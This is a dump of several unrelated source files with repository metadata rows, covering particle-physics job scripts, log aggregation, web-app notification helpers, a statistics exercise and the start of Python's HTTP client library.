for n in range(ncpus):
cmd += "sumHistos--simulation10GeV-repro-"+str(n)+".root "
os.system(cmd)
else:
t='repro'
if D=='1GeV':
cmd = "python $FAIRSHIP/charmdet/MufluxNtuple.py -t "+t+" -d simulation1GeV-"+t+" -c MufluxReco -A True &"
os.system(cmd)
cmd = "python $FAIRSHIP/charmdet/MufluxNtuple.py -t "+t+" -d simulation1GeV-"+t+" -c MufluxReco -C True &"
os.system(cmd)
elif D=='10GeV':
for n in range(ncpus):
cmd = "python $FAIRSHIP/charmdet/MufluxNtuple.py -t "+t+" -d simulation10GeV-"+t+" -c MufluxReco -B True -s "+str(n)+ " -x "+str(ncpus)+" &"
os.system(cmd)
while 1>0:
if count_python_processes('MufluxNtuple')<ncpus: break
time.sleep(20)
elif D=='Jpsi':
for n in range(ncpus):
cmd = "python $FAIRSHIP/charmdet/MufluxNtuple.py -t "+t+" -d JpsiProduction -c MufluxReco -J True -s "+str(n)+ " -x "+str(ncpus)+" &"
os.system(cmd)
while 1>0:
if count_python_processes('MufluxNtuple')<ncpus: break
time.sleep(20)
elif D=='JpsiP8':
for n in range(ncpus):
cmd = "python $FAIRSHIP/charmdet/MufluxNtuple.py -t "+t+" -d JpsiProduction -c MufluxReco -8 True -s "+str(n)+ " -x "+str(ncpus)+" &"
os.system(cmd)
while 1>0:
if count_python_processes('MufluxNtuple')<ncpus: break
time.sleep(20)
def runInvMass(MC='1GeV',merge=False):
N = 20
t='repro'
if not merge:
if MC=='Jpsi':
for n in range(N):
cmd = "python $FAIRSHIP/charmdet/MufluxNtuple.py -d JpsiProduction -t "+t+" -c invMass -p ship-ubuntu-1710-48 -s "+str(n)+ " -x "+str(N)+" -J True -r &"
print cmd
os.system(cmd)
while 1>0:
if count_python_processes('MufluxNtuple')<ncpus: break
time.sleep(20)
if MC=='JpsiP8':
for n in range(N):
cmd = "python $FAIRSHIP/charmdet/MufluxNtuple.py -d JpsiProduction_P8 -t "+t+" -c invMass -p ship-ubuntu-1710-16 -s "+str(n)+ " -x "+str(N)+" -8 True -r &"
print cmd
os.system(cmd)
while 1>0:
if count_python_processes('MufluxNtuple')<ncpus: break
time.sleep(20)
elif MC=='1GeV':
cmd = "python $FAIRSHIP/charmdet/MufluxNtuple.py -d simulation1GeV-"+t+" -t "+t+" -c invMass -p ship-ubuntu-1710-48 -A True -r &"
print cmd
os.system(cmd)
elif MC=='10GeV':
for n in range(N):
cmd = "python $FAIRSHIP/charmdet/MufluxNtuple.py -d simulation10GeV-"+t+" -t "+t+" -c invMass -p ship-ubuntu-1710-48 -s "+str(n)+ " -x "+str(N)+" -B True -r &"
print cmd
os.system(cmd)
while 1>0:
if count_python_processes('MufluxNtuple')<ncpus: break
time.sleep(20)
else:
print "case not known, stop"
1/0
else:
if MC=='Jpsi' or MC=='JpsiP8':
cmd = 'hadd -f invMass-MC-Jpsi.root '
for n in range(N):
cmd+='invMass-MC-'+str(n)+'_refit.root '
os.system(cmd)
cmd = 'hadd -f ntuple-invMass-MC-Jpsi.root '
for n in range(N):
cmd+='ntuple-invMass-MC-'+str(n)+'_refit.root '
os.system(cmd)
else:
x=''
if t=='repro': x='_refit'
cmd = 'hadd -f invMass-MC-'+MC+x+'.root '
for n in range(N):
cmd+='invMass-MC-'+str(n)+x+'.root '
os.system(cmd)
cmd = 'hadd -f ntuple-invMass-MC-'+MC+x+'.root '
for n in range(N):
cmd+='ntuple-invMass-MC-'+str(n)+x+'.root '
os.system(cmd)
def checkStatistics(splitFactor=5):
# 1GeV mbias 1.8 Billion PoT charm 10.2 Billion PoT
simFiles = getFilesFromEOS() # input data
reco,x,y = checkFilesWithTracks() #
Nsim = {'mbias':0,'charm':0}
Nreco = {'mbias':0,'charm':0}
for f in simFiles:
if f.find('charm')>0: Nsim['charm']+=simFiles[f]
else: Nsim['mbias'] += simFiles[f]
allFiles = {}
for a in simFiles.keys():
x = a.split('/')
allFiles[x[len(x)-1].replace('.root','')]=simFiles[a]
for dname in allFiles:
n = 0
for x in reco:
if not x.find(dname)<0: n+=1
fraction = n/float(splitFactor)
print "fraction:",dname,fraction
if dname.find('charm')>0: Nreco['charm']+=fraction*allFiles[dname]
else: Nreco['mbias'] += fraction*allFiles[dname]
print "total statistics, simulated ",Nsim
print " , reconstructed ",Nreco
# mbias statistics = 1.8 * Nreco/Nsim, charm statistics = 10.2 * Nreco/Nsim
# norm factor = 1/charm statistics * mbias statistics
print "internal MC normalization, to be applied to charm", 1.8*Nreco['mbias']/Nsim['mbias'] /(10.2*Nreco['charm']/Nsim['charm'])
def mergeOnurFiles(merge=False):
if not merge:
eospath = "/eos/experiment/ship/user/odurhan/Muflux-Digi"
temp = subprocess.check_output("xrdfs "+os.environ['EOSSHIP']+" ls -l "+eospath,shell=True)
fl = []
for x in temp.split('\n'):
if x.find('dig.root')<0: continue
d = x[x.rfind('/')+1:]
fin = ROOT.TFile.Open(os.environ['EOSSHIP']+eospath+'/'+d)
if not fin: continue
t = fin.Get('cbmsim')
if not t: continue
if not t.FindBranch('FitTracks'): continue
fout = ROOT.TFile(d,'recreate')
sTree = t.CloneTree(0)
nEvents = 0
pointContainers = []
for b in sTree.GetListOfBranches():
name = b.GetName()
if not name.find('Point')<0: pointContainers.append('sTree.'+name+'.GetEntries()') # makes use of convention that all sensitive detectors fill XXXPoint containers
for n in range(t.GetEntries()):
rc = t.GetEvent(n)
empty = True
for p in pointContainers:
if eval(p)>0: empty = False
if not empty:
rc = sTree.Fill()
nEvents+=1
sTree.AutoSave()
fout.Close()
print("removed empty events, left with:", nEvents)
fin.SetWritable(False) # bpyass flush error
else:
N=0
cmd = 'hadd -f ship.conical.FixedTarget-TGeant4_merged_dig.root '
for x in os.listdir('.'):
N+=1
cmd += x+' '
if N%500==0:
os.system(cmd)
os.system('cp ship.conical.FixedTarget-TGeant4_merged_dig.root tmp.root')
cmd = 'hadd -f ship.conical.FixedTarget-TGeant4_merged_dig.root tmp.root '
os.system(cmd)
def JpsiProduction(step='simulation',prod='P8'):
# directory should be ship-ubuntu-1710-48/JpsiProduction
path = {}
path['Cascade'] ="ship-ubuntu-1710-48_run_MufluxfixedTarget_XXX/"
path['P8'] ="ship-ubuntu-1710-16_run_MufluxfixedTarget_XXX/"
ncpus = 16
Ntot = {'Cascade':20313583,'P8':2293179}
InFile = {'Cascade':"/eos/experiment/ship/data/jpsicascade/cascade_MSEL61_20M.root" ,
'P8':"/eos/experiment/ship/user/truf/muflux-sim/JpsiProduction_P8/Jpsi-Pythia8_21788000000_0-3074.root"}
Nstart = 0
delN = int(float(Ntot[prod])/float(ncpus))
if step == 'simulation':
for n in range(ncpus):
cmd = "python $SHIPBUILD/FairShip/muonShieldOptimization/run_MufluxfixedTarget.py -C -P -I "+ InFile[prod] +" -J -e 10. -n "+str(delN)+" -S "+str(Nstart)+ " -r "+str(n)+" &"
Nstart+=delN
os.system(cmd)
if step == 'digi':
for n in range(ncpus):
d = path[prod].replace('XXX',str(n))
os.chdir(d)
mcFile = 'pythia8_Geant4_'+str(n)+'_10.0.root'
if mcFile.replace('.root','_dig.root') in os.listdir('.'):
print "File already exists, skip",mcFile.replace('.root','_dig.root')
os.chdir('../')
continue
geoFile = 'geofile_full.root'
cmd = "python $FAIRSHIP/macro/runMufluxDigi.py -n 9999999 -f "+mcFile+" -g "+geoFile+" &"
print 'step digi:', cmd,' in directory ',d
os.system(cmd)
os.chdir('../')
while 1>0:
if count_python_processes('runMufluxDigi')<ncpus/2: break
time.sleep(100)
if step == 'reco':
for n in range(ncpus):
d = path[prod].replace('XXX',str(n))
os.chdir(d)
recoFile = 'pythia8_Geant4_'+str(n)+'_10.0_dig.root'
cmd = "python $FAIRSHIP/charmdet/drifttubeMonitoring.py -c recoStep1 -u 1 -f "+recoFile+' &'
print 'step reco:', cmd,' in directory ',d
os.system(cmd)
os.chdir('../')
while 1>0:
if count_python_processes('drifttubeMonitoring')<ncpus/2: break
time.sleep(100)
print "finished all the ",step," tasks"
def JpsiCopyToEOS(RT=False,prod='P8'):
ncpus = range(16)
dirName={}
dirName['P8'] ="ship-ubuntu-1710-16_run_MufluxfixedTarget_XX/"
dirName['Cascade']="ship-ubuntu-1710-48_run_MufluxfixedTarget_XX/"
eosPath = {}
eosPath['P8'] =" $EOSSHIP/eos/experiment/ship/user/truf/muflux-sim/JpsiProduction_P8/"
eosPath['Cascade'] =" $EOSSHIP/eos/experiment/ship/user/truf/muflux-sim/JpsiProduction/"
for n in ncpus:
fileName = "pythia8_Geant4_"+str(n)+"_10.0.root"
if RT=='RT': fileName = fileName.replace('.root','_dig_RT.root')
if RT=='ntuple': fileName = 'ntuple-'+fileName.replace('.root','_dig_RT.root')
cmd = "xrdcp "+dirName[prod].replace('XX',str(n))+fileName+eosPath[prod]+fileName
print cmd
rc = os.system(cmd)
# if rc == 0: os.system('rm '+dirName+fileName)
def JpsiHistos(command = "anaResiduals",prod = 'P8',merge=False):
# MCJpsiProd
if prod == 'Cascade': D = "$EOSSHIP/eos/experiment/ship/user/truf/muflux-sim/JpsiProduction/"
elif prod == 'P8': D = "$EOSSHIP/eos/experiment/ship/user/truf/muflux-sim/JpsiProduction_P8/"
else:
print prod," not supported"
exit()
cmd = 'hadd -f '+commandToSum[command]+'.root '
for n in [1]:
# for n in range(16):
if prod == 'Cascade': dirName = "ship-ubuntu-1710-48_run_MufluxfixedTarget_"+str(n)
if prod == 'P8': dirName = "ship-ubuntu-1710-16_run_MufluxfixedTarget_"+str(n)
fileName = "pythia8_Geant4_"+str(n)+"_10.0_dig_RT.root"
if not merge:
cmd = "python $FAIRSHIP/charmdet/drifttubeMonitoring.py -c "+command+" -f "+D+fileName+' &'
os.chdir(dirName)
print 'execute:', cmd
os.system(cmd)
os.chdir('../')
else:
cmd += dirName+'/'+commandToHist[command]+fileName+' '
if merge: os.system(cmd)
from array import array
def extractJpsi(prod = '10GeV'):
Fntuple = 'JpsifromBackground-'+prod+'.root'
ftup = ROOT.TFile.Open(Fntuple, 'RECREATE')
Ntup = ROOT.TNtuple("pythia8","pythia8 Jpsi","id:px:py:pz:E:M:mid:mpx:mpy:mpz:mE:mM")
template={}
template['10GeV'] = ['/eos/experiment/ship/data/Mbias/background-prod-2018/pythia8_Geant4_10.0_cXXXX_mu.root',67]
template['1GeV'] = ['/eos/experiment/ship/data/Mbias/background-prod-2018/pythia8_Geant4_1.0_cXXXX_mu.root',20]
for n in range(0,template[prod][1]):
fname = template[prod][0].replace('XXXX',str(n*1000))
f=ROOT.TFile.Open(os.environ['EOSSHIP']+fname)
print "opening ",fname,f.cbmsim.GetEntries()
for event in f.cbmsim:
jpsi = False
for m in event.MCTrack:
if m.GetPdgCode()==443:
jpsi = True
break
if not jpsi: continue
vl=array('f')
vl.append(float(m.GetPdgCode()))
vl.append(m.GetPx())
vl.append(m.GetPy())
vl.append(m.GetPz())
vl.append(m.GetEnergy())
vl.append(m.GetMass())
vl.append(float(event.MCTrack[1].GetPdgCode()))
vl.append(event.MCTrack[0].GetPx())
vl.append(event.MCTrack[0].GetPy())
vl.append(event.MCTrack[0].GetPz())
vl.append(event.MCTrack[0].GetEnergy())
if m.GetMotherId() < 0:
vl.append(-1)
else:
vl.append(float(event.MCTrack[m.GetMotherId()].GetPdgCode()))
rc = Ntup.Fill(vl)
ftup.cd()
Ntup.Write()
ftup.Close()
| [
"[email protected]"
] | |
2b3018fd53876b1bd94dc8c35c89202502fb585b | 13131e0e4805aa48bf64647f5da666e2e72dab9a | /misc/aggregate_logs_and_stats.py | 1b29c5437f03387cef5aede4d88bb57b7142ffbc | [] | no_license | m-bain/collaborative-experts | 4ae6632f0ec36b612b768048b2daa623d8b4c385 | 3a224ecad6fe36722112181c3ac48f918a799081 | refs/heads/master | 2021-01-08T19:43:14.689074 | 2020-02-16T06:05:06 | 2020-02-16T06:05:06 | 242,124,924 | 1 | 0 | null | 2020-02-21T11:35:41 | 2020-02-21T11:35:40 | null | UTF-8 | Python | false | false | 2,161 | py | """Aggregate logs across multiple seeded runs and summarise their statistics.
"""
import argparse
import logging
from pathlib import Path
from collections import OrderedDict
from utils.util import read_json
from logger.log_parser import log_summary
def summarise(group_id, log_dir="data/saved/log", model_dir="data/saved/models"):
seeded_runs = sorted(list(Path(log_dir).glob(f"**/{group_id}/seed-*")))
print(f"Found a total of {len(seeded_runs)} seed runs in {group_id}")
info_logs = OrderedDict()
for seeded_run in seeded_runs:
info_log_matches = list(Path(seeded_run).glob("**/info.log"))
msg = f"expected to find a single info.log file, found {len(info_log_matches)}"
assert len(info_log_matches) == 1, msg
info_logs[seeded_run.stem] = info_log_matches[0]
summary_log = []
for seeded_run, info_log_path in info_logs.items():
with open(info_log_path, "r") as f:
log = f.read().splitlines()
summary_log.extend(log)
first_info_log = list(info_logs.values())[0]
summary_log_name = f"summary-{'_'.join(list(info_logs.keys()))}.json"
summary_log_path = first_info_log.parent / summary_log_name
with open(summary_log_path, "w") as f:
f.write("\n".join(summary_log))
print(f"Wrote summary log to {summary_log_path}")
# retrieve the config from the first run
rel_path = first_info_log.relative_to(log_dir).parent
config_path = Path(model_dir) / rel_path / "config.json"
assert config_path.exists(), f"Could not find config at {config_path}"
config = read_json(config_path)
logger = logging.getLogger("summary")
logging.basicConfig(filename=summary_log_path, level=logging.INFO)
logger.addHandler(logging.StreamHandler())
log_summary(
logger=logger,
log_path=summary_log_path,
eval_mode=config["eval_mode"],
fixed_num_epochs=config["trainer"]["epochs"],
)
def main():
parser = argparse.ArgumentParser()
parser.add_argument("--group_id", default="ed53d01d")
args = parser.parse_args()
summarise(group_id=args.group_id)
if __name__ == '__main__':
main() | [
"[email protected]"
] | |
6b39dee81dd9f2c3d18cd4ad5ec017627ab539e7 | 8fcc27160f8700be46296568260fa0017a0b3004 | /client/spacecomponents/server/eventLogger.py | fb49f52c4e8741c49e6cc178d8184b066a6f509d | [] | no_license | connoryang/dec-eve-serenity | 5d867f4eedfa896a4ef60f92556356cafd632c96 | b670aec7c8b4514fc47cd52e186d7ccf3aabb69e | refs/heads/master | 2021-01-22T06:33:16.303760 | 2016-03-16T15:15:32 | 2016-03-16T15:15:32 | 56,389,750 | 1 | 0 | null | 2016-04-16T15:05:24 | 2016-04-16T15:05:24 | null | UTF-8 | Python | false | false | 1,022 | py | #Embedded file name: e:\jenkins\workspace\client_SERENITY\branches\release\SERENITY\packages\spacecomponents\server\eventLogger.py
from eveexceptions.exceptionEater import ExceptionEater
EVENT_DECAYED = 'spacecomponent::decay_Decayed'
EVENT_BECOMEACTIVE = 'spacecomponent::activate_BecomeActive'
class EventLogger(object):
def __init__(self, eventLog, solarSystemID):
self.eventLog = eventLog
self.solarSystemID = solarSystemID
def LogDecayed(self, item):
self.LogItemAndTypeOwnerEvent(EVENT_DECAYED, item)
def LogBecomeActive(self, item):
self.LogItemAndTypeOwnerEvent(EVENT_BECOMEACTIVE, item)
def LogItemAndTypeOwnerEvent(self, eventName, item):
with ExceptionEater('eventLog'):
self.eventLog.LogOwnerEvent(eventName, item.ownerID, self.solarSystemID, item.itemID, item.typeID)
self.eventLog.LogOwnerEventJson(eventName, item.ownerID, self.solarSystemID, componentItemID=item.itemID, componentTypeID=item.typeID)
| [
"[email protected]"
] | |
b0a3d83e3ea47c4f5c9fbde1b07b287a2ff2fa15 | 011823c0aa4335db3a523107b0916dbc2ca2c8c1 | /app/main/__init__.py | 93e67d393286660ada0d04eecdb31d8460c288a1 | [
"MIT"
] | permissive | VirginiaNdungu1/Gypsy | 570b3a84497528e71a27cb2634794021e8a5a2e3 | fe610f0087061c77b1a18ca184ae426ad92ec0b9 | refs/heads/master | 2021-07-25T09:02:08.090011 | 2017-11-06T06:48:37 | 2017-11-06T06:48:37 | 109,368,268 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 93 | py | from flask import Blueprint
main = Blueprint('main', __name__)
from . import views, forms
| [
"[email protected]"
] | |
ad194816a6379fa3222c48a90e327ef99945ece2 | a8b17b17f9b2a640013064c50e1cebc27a7a68de | /16-statistical-thinking-in-python-pt2/01-parameter-estimation-by-optimization/01-how-often-do-we-get-no-hitters.py | 8e07aef449d1b4f71f6836c43205c929a66754b4 | [] | no_license | JohnnyFang/datacamp | 20eae09752521f14006cb3fda600b10bd7b12398 | 0fa8fa7682c23b0eb07bd03e4b75f5b77aeafa75 | refs/heads/master | 2020-04-18T00:27:37.358176 | 2020-02-04T20:54:19 | 2020-02-04T20:54:19 | 167,078,316 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,031 | py | '''
How often do we get no-hitters?
The number of games played between each no-hitter in the modern era (1901-2015) of Major League Baseball is stored in the array nohitter_times.
If you assume that no-hitters are described as a Poisson process, then the time between no-hitters is Exponentially distributed. As you have seen, the Exponential distribution has a single parameter, which we will call τ
, the typical interval time. The value of the parameter τ
that makes the exponential distribution best match the data is the mean interval time (where time is in units of number of games) between no-hitters.
Compute the value of this parameter from the data. Then, use np.random.exponential() to "repeat" the history of Major League Baseball by drawing inter-no-hitter times from an exponential distribution with the τ
you found and plot the histogram as an approximation to the PDF.
NumPy, pandas, matlotlib.pyplot, and seaborn have been imported for you as np, pd, plt, and sns, respectively.
Instructions
Seed the random number generator with 42.
Compute the mean time (in units of number of games) between no-hitters.
Draw 100,000 samples from an Exponential distribution with the parameter you computed from the mean of the inter-no-hitter times.
Plot the theoretical PDF using plt.hist(). Remember to use keyword arguments bins=50, normed=True, and histtype='step'. Be sure to label your axes.
Show your plot.
'''
# Seed random number generator
np.random.seed(42)
# Compute mean no-hitter time: tau
tau = np.mean(nohitter_times)
# Draw out of an exponential distribution with parameter tau: inter_nohitter_time
inter_nohitter_time = np.random.exponential(tau, 100000)
# Plot the PDF and label axes
_ = plt.hist(inter_nohitter_time,
bins=50, normed=True, histtype='step')
_ = plt.xlabel('Games between no-hitters')
_ = plt.ylabel('PDF')
# Show the plot
plt.show()
# We see the typical shape of the Exponential distribution, going from a maximum at 0 and decaying to the right.
| [
"[email protected]"
] | |
6bf01c4d7cdaa26a436edc642c3871f8a1df6b49 | 9be5b6259e4db9a9386d5e6eea59bfb4ed4ccdbd | /liberapay/notifications/web.py | d3677868d705e6ac8647ec0f6c6f06ec7f41dc0b | [
"CC0-1.0",
"LicenseRef-scancode-public-domain"
] | permissive | Changaco/liberapay.com | b3e040ed24d47a6ebccdd0b2285526f02b4103cc | 4d134508c911f23478e80b8d8ff62223b866bb5e | refs/heads/master | 2021-01-16T21:47:57.475734 | 2015-09-02T15:41:50 | 2015-09-02T15:41:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,371 | py | from __future__ import division, print_function, unicode_literals
def withdrawal_failed(_, user, exchange):
href = '/%s/receiving/payout?exchange_id=%s' % (user.username, exchange.id)
return ('danger',
['a',
{'href': href}, _("The transfer to your bank account has failed!"),
]
)
def withdrawal_pending(_, user, exchange, Money):
return ('success',
['span', _("We have initiated a transfer of {0} from your Liberapay wallet to your bank account.",
Money(exchange.amount - exchange.fee, 'EUR'))
]
)
def charge_failed(_, user, exchange, Money):
href = '/%s/giving/payin?exchange_id=%s' % (user.username, exchange.id)
return ('danger',
['a', {'href': href},
_("We tried to charge your credit card {0}, but it failed!",
Money(exchange.amount + exchange.fee, 'EUR'))
]
)
def charge_succeeded(_, user, exchange, Money):
return ('success',
['span', _("We charged your credit card {0} to fund your ongoing donations.",
Money(exchange.amount + exchange.fee, 'EUR'))
]
)
def pledgee_joined(_, user_name, platform, profile_url):
return ('info',
['a',
{'href': profile_url},
_("{0} from {1} has joined Liberapay!", user_name, platform),
]
)
| [
"[email protected]"
] | |
cdf4bd815623a394fb53085fd197221e82e966f1 | e6dab5aa1754ff13755a1f74a28a201681ab7e1c | /.parts/lib/django-1.5/django/conf/project_template/manage.py | 2e8e79612df8fd85e1f1355b06620fb5cc2dfa6d | [] | no_license | ronkagan/Euler_1 | 67679203a9510147320f7c6513eefd391630703e | 022633cc298475c4f3fd0c6e2bde4f4728713995 | refs/heads/master | 2021-01-06T20:45:52.901025 | 2014-09-06T22:34:16 | 2014-09-06T22:34:16 | 23,744,842 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 104 | py | /home/action/.parts/packages/googleappengine/1.9.4/lib/django-1.5/django/conf/project_template/manage.py | [
"[email protected]"
] | |
5186b10cd80cab8f8320b0162dfd8881526c443f | 93a613f09d564a1d45ecc01b54b73745ce2850b7 | /majora2/management/commands/load_counties.py | 7e60d9acd4fc67489980ad313b871f818eb9608d | [] | no_license | pythseq/majora | fa17c77fa8a916c688fd2b40744d768dd851b99b | 40b918d32b4061cddee5f7279f97e70eb894623d | refs/heads/master | 2022-12-23T20:09:41.233844 | 2020-09-28T18:18:42 | 2020-09-28T18:18:42 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 574 | py | from django.core.management.base import BaseCommand, CommandError
from majora2 import models
class Command(BaseCommand):
help = "Load a list of counties"
def add_arguments(self, parser):
parser.add_argument('filename')
def handle(self, *args, **options):
fh = open(options["filename"])
for line in fh:
fields = line.strip().split('\t')
country_code = fields[0]
name = fields[1]
c, created = models.County.objects.get_or_create(country_code=country_code, name=name)
c.save()
| [
"[email protected]"
] | |
dc1979d0dfa2472504e14ad8cf2ef93d203ce0fe | 524591f2c4f760bc01c12fea3061833847a4ff9a | /arm/usr/lib/python3.5/http/client.py | 350313e87b32e275ac2f296b563f6f75845c6073 | [
"BSD-3-Clause",
"Python-2.0"
] | permissive | Roboy/roboy_plexus | 6f78d45c52055d97159fd4d0ca8e0f32f1fbd07e | 1f3039edd24c059459563cb81d194326fe824905 | refs/heads/roboy3 | 2023-03-10T15:01:34.703853 | 2021-08-16T13:42:54 | 2021-08-16T13:42:54 | 101,666,005 | 2 | 4 | BSD-3-Clause | 2022-10-22T13:43:45 | 2017-08-28T16:53:52 | C++ | UTF-8 | Python | false | false | 48,714 | py | """HTTP/1.1 client library
<intro stuff goes here>
<other stuff, too>
HTTPConnection goes through a number of "states", which define when a client
may legally make another request or fetch the response for a particular
request. This diagram details these state transitions:
(null)
|
| HTTPConnection()
v
Idle
|
| putrequest()
v
Request-started
|
| ( putheader() )* endheaders()
v
Request-sent
|\_____________________________
| | getresponse() raises
| response = getresponse() | ConnectionError
v v
Unread-response Idle
[Response-headers-read]
|\____________________
| |
| response.read() | putrequest()
v v
Idle Req-started-unread-response
______/|
/ |
response.read() | | ( putheader() )* endheaders()
v v
Request-started Req-sent-unread-response
|
| response.read()
v
Request-sent
This diagram presents the following rules:
-- a second request may not be started until {response-headers-read}
-- a response [object] cannot be retrieved until {request-sent}
-- there is no differentiation between an unread response body and a
partially read response body
Note: this enforcement is applied by the HTTPConnection class. The
HTTPResponse class does not enforce this state machine, which
implies sophisticated clients may accelerate the request/response
pipeline. Caution should be taken, though: accelerating the states
beyond the above pattern may imply knowledge of the server's
connection-close behavior for certain requests. For example, it
is impossible to tell whether the server will close the connection
UNTIL the response headers have been read; this means that further
requests cannot be placed into the pipeline until it is known that
the server will NOT be closing the connection.
Logical State __state __response
------------- ------- ----------
Idle _CS_IDLE None
Request-started _CS_REQ_STARTED None
Request-sent _CS_REQ_SENT None
Unread-response _CS_IDLE <response_class>
Req-started-unread-response _CS_REQ_STARTED <response_class>
Req-sent-unread-response _CS_REQ_SENT <response_class>
"""
import email.parser
import email.message
import http
import io
import os
import re
import socket
import collections
from urllib.parse import urlsplit
# HTTPMessage, parse_headers(), and the HTTP status code constants are
# intentionally omitted for simplicity
__all__ = ["HTTPResponse", "HTTPConnection",
"HTTPException", "NotConnected", "UnknownProtocol",
"UnknownTransferEncoding", "UnimplementedFileMode",
"IncompleteRead", "InvalidURL", "ImproperConnectionState",
"CannotSendRequest", "CannotSendHeader", "ResponseNotReady",
"BadStatusLine", "LineTooLong", "RemoteDisconnected", "error",
"responses"]
HTTP_PORT = 80
HTTPS_PORT = 443
_UNKNOWN = 'UNKNOWN'
# connection states
_CS_IDLE = 'Idle'
_CS_REQ_STARTED = 'Request-started'
_CS_REQ_SENT = 'Request-sent'
# hack to maintain backwards compatibility
globals().update(http.HTTPStatus.__members__)
# another hack to maintain backwards compatibility
# Mapping status codes to official W3C names
responses = {v: v.phrase for v in http.HTTPStatus.__members__.values()}
# maximal amount of data to read at one time in _safe_read
MAXAMOUNT = 1048576
# maximal line length when calling readline().
_MAXLINE = 65536
_MAXHEADERS = 100
# Header name/value ABNF (http://tools.ietf.org/html/rfc7230#section-3.2)
#
# VCHAR = %x21-7E
# obs-text = %x80-FF
# header-field = field-name ":" OWS field-value OWS
# field-name = token
# field-value = *( field-content / obs-fold )
# field-content = field-vchar [ 1*( SP / HTAB ) field-vchar ]
# field-vchar = VCHAR / obs-text
#
# obs-fold = CRLF 1*( SP / HTAB )
# ; obsolete line folding
# ; see Section 3.2.4
# token = 1*tchar
#
# tchar = "!" / "#" / "$" / "%" / "&" / "'" / "*"
# / "+" / "-" / "." / "^" / "_" / "`" / "|" / "~"
# / DIGIT / ALPHA
# ; any VCHAR, except delimiters
#
# VCHAR defined in http://tools.ietf.org/html/rfc5234#appendix-B.1
# the patterns for both name and value are more leniant than RFC
# definitions to allow for backwards compatibility
_is_legal_header_name = re.compile(rb'[^:\s][^:\r\n]*').fullmatch
_is_illegal_header_value = re.compile(rb'\n(?![ \t])|\r(?![ \t\n])').search
# We always set the Content-Length header for these methods because some
# servers will otherwise respond with a 411
_METHODS_EXPECTING_BODY = {'PATCH', 'POST', 'PUT'}
def _encode(data, name='data'):
"""Call data.encode("latin-1") but show a better error message."""
try:
return data.encode("latin-1")
except UnicodeEncodeError as err:
raise UnicodeEncodeError(
err.encoding,
err.object,
err.start,
err.end,
"%s (%.20r) is not valid Latin-1. Use %s.encode('utf-8') "
"if you want to send it encoded in UTF-8." %
(name.title(), data[err.start:err.end], name)) from None
class HTTPMessage(email.message.Message):
# XXX The only usage of this method is in
# http.server.CGIHTTPRequestHandler. Maybe move the code there so
# that it doesn't need to be part of the public API. The API has
# never been defined so this could cause backwards compatibility
# issues.
def getallmatchingheaders(self, name):
"""Find all header lines matching a given header name.
Look through the list of headers and find all lines matching a given
header name (and their continuation lines). A list of the lines is
returned, without interpretation. If the header does not occur, an
empty list is returned. If the header occurs multiple times, all
occurrences are returned. Case is not important in the header name.
"""
name = name.lower() + ':'
n = len(name)
lst = []
hit = 0
for line in self.keys():
if line[:n].lower() == name:
hit = 1
elif not line[:1].isspace():
hit = 0
if hit:
lst.append(line)
return lst
def parse_headers(fp, _class=HTTPMessage):
"""Parses only RFC2822 headers from a file pointer.
email Parser wants to see strings rather than bytes.
But a TextIOWrapper around self.rfile would buffer too many bytes
from the stream, bytes which we later need to read as bytes.
So we read the correct bytes here, as bytes, for email Parser
to parse.
"""
headers = []
while True:
line = fp.readline(_MAXLINE + 1)
if len(line) > _MAXLINE:
raise LineTooLong("header line")
headers.append(line)
if len(headers) > _MAXHEADERS:
raise HTTPException("got more than %d headers" % _MAXHEADERS)
if line in (b'\r\n', b'\n', b''):
break
hstring = b''.join(headers).decode('iso-8859-1')
return email.parser.Parser(_class=_class).parsestr(hstring)
class HTTPResponse(io.BufferedIOBase):
# See RFC 2616 sec 19.6 and RFC 1945 sec 6 for details.
# The bytes from the socket object are iso-8859-1 strings.
# See RFC 2616 sec 2.2 which notes an exception for MIME-encoded
# text following RFC 2047. The basic status line parsing only
# accepts iso-8859-1.
def __init__(self, sock, debuglevel=0, method=None, url=None):
# If the response includes a content-length header, we need to
# make sure that the client doesn't read more than the
# specified number of bytes. If it does, it will block until
# the server times out and closes the connection. This will
# happen if a self.fp.read() is done (without a size) whether
# self.fp is buffered or not. So, no self.fp.read() by
# clients unless they know what they are doing.
self.fp = sock.makefile("rb")
self.debuglevel = debuglevel
self._method = method
# The HTTPResponse object is returned via urllib. The clients
# of http and urllib expect different attributes for the
# headers. headers is used here and supports urllib. msg is
# provided as a backwards compatibility layer for http
# clients.
self.headers = self.msg = None
# from the Status-Line of the response
self.version = _UNKNOWN # HTTP-Version
self.status = _UNKNOWN # Status-Code
self.reason = _UNKNOWN # Reason-Phrase
self.chunked = _UNKNOWN # is "chunked" being used?
self.chunk_left = _UNKNOWN # bytes left to read in current chunk
self.length = _UNKNOWN # number of bytes left in response
self.will_close = _UNKNOWN # conn will close at end of response
def _read_status(self):
line = str(self.fp.readline(_MAXLINE + 1), "iso-8859-1")
if len(line) > _MAXLINE:
raise LineTooLong("status line")
if self.debuglevel > 0:
print("reply:", repr(line))
if not line:
# Presumably, the server closed the connection before
# sending a valid response.
raise RemoteDisconnected("Remote end closed connection without"
" response")
try:
version, status, reason = line.split(None, 2)
except ValueError:
try:
version, status = line.split(None, 1)
reason = ""
except ValueError:
# empty version will cause next test to fail.
version = ""
if not version.startswith("HTTP/"):
self._close_conn()
raise BadStatusLine(line)
# The status code is a three-digit number
try:
status = int(status)
if status < 100 or status > 999:
raise BadStatusLine(line)
except ValueError:
raise BadStatusLine(line)
return version, status, reason
def begin(self):
if self.headers is not None:
# we've already started reading the response
return
# read until we get a non-100 response
while True:
version, status, reason = self._read_status()
if status != CONTINUE:
break
# skip the header from the 100 response
while True:
skip = self.fp.readline(_MAXLINE + 1)
if len(skip) > _MAXLINE:
raise LineTooLong("header line")
skip = skip.strip()
if not skip:
break
if self.debuglevel > 0:
print("header:", skip)
self.code = self.status = status
self.reason = reason.strip()
if version in ("HTTP/1.0", "HTTP/0.9"):
# Some servers might still return "0.9", treat it as 1.0 anyway
self.version = 10
elif version.startswith("HTTP/1."):
self.version = 11 # use HTTP/1.1 code for HTTP/1.x where x>=1
else:
raise UnknownProtocol(version)
self.headers = self.msg = parse_headers(self.fp)
if self.debuglevel > 0:
for hdr in self.headers:
print("header:", hdr, end=" ")
# are we using the chunked-style of transfer encoding?
